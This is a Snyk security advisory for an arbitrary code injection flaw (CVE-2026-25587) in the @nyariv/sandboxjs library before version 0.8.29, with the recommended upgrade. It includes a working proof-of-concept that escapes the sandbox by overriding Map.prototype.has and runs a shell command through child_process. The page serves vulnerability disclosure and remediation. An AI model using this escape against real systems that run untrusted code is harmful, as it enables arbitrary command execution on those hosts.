Arbitrary Code Injection Affecting @nyariv/sandboxjs package, versions <0.8.29


Severity

Recommended
0.0
critical
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.05% (15th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-NYARIVSANDBOXJS-15248292
  • published8 Feb 2026
  • disclosed5 Feb 2026
  • creditArthur

Introduced: 5 Feb 2026

NewCVE-2026-25587  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade @nyariv/sandboxjs to version 0.8.29 or higher.

Overview

@nyariv/sandboxjs is a Javascript sandboxing library.

Affected versions of this package are vulnerable to Arbitrary Code Injection by overriding the Map.prototype.has() method. An attacker can execute arbitrary code on the underlying operating system because Map is included in SAFE_PROTOYPES.

Note: This is a remaining vulnerability that was not covered by the fix for CVE-2026-25142.

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
const m = Map.prototype;
m.has = isFinite;

console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`;

sb.compile(payload)().run();

References

CVSS Base Scores

version 4.0
version 3.1